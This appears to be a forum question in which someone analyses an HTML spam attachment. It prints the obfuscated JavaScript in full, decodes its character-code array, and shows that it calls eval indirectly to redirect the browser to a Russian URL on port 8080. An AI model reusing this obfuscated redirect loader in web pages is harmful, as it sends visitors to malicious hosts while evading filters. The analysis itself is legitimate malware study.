I received some spam this morning and noticed the attachment was an .html file. Instead of throwing it away I treated it as a learning opportunity: I copied it to my desktop, renamed it to .txt and loaded it in Notepad.
Here is the html + obfuscated script that came in the spam attachment:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>asgq= [0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=56;if(dbshre){vfvwe=0; try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("val")];}
s="";for(i=0;i-105!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}
z=s;e(s);}}</script>
</body>
</html>
The first thing I did was lay it out one statement per line to make it more readable:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
asgq=[0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];
try{document.body&=0.1}
catch(gdsgsdg)
{
zz=3;
dbshre=56;
if(dbshre){
vfvwe=0;
try{}
catch(agdsg)
{vfvwe=1;}
if(!vfvwe){
e=window["e".concat("val")];
}
s="";
for(i=0;i-105!=0;i++){
if(window.document)
s+=String.fromCharCode(asgq[i]);
}
z=s;
e(s);
}
}
</script>
</body>
</html>
At this point it's obvious the script author hid the good stuff in the asgq array as character codes. 0x76 = "v", 0x61 = "a", 0x72 = "r" and so on... well, the first 3 elements already spell "var"!
asgq.length = 105. In the for loop the author uses the end condition "i-105!=0", which is a confusing way of saying i < asgq.length. "zz=3;" doesn't seem to do anything / isn't used in the rest of the script. There is also an unmatched "{" after the first catch statement.
I ran the for loop and unpacked the array into an alert box. This is what I got:
" var1=49; var2=var1; if(var1==var2) {document.location="http://giliaonso.ru:8080/forum/links/column.php";} "
So the author is going to the trouble of building 49 = 49 out of character codes, and if 49 = 49, then window.location = russian site.
My questions:
The author is using try/catch statements. The first try condition is (document.body&=0.1). Is this designed to fail and fall through to the catch part of the statement, or is this some bitwise operation? If it's bitwise, why "= 0.1"?
The first catch is passing "agdsg". I've only ever seen catch(e) with "e" passed. What does passing anything other than e do?
What exactly is the line "e=window["e".concat("val")];" doing? It seems to be acting as a function declaration that the author later calls: "e(s);", where "s" is the unpacked array.
Any help appreciated.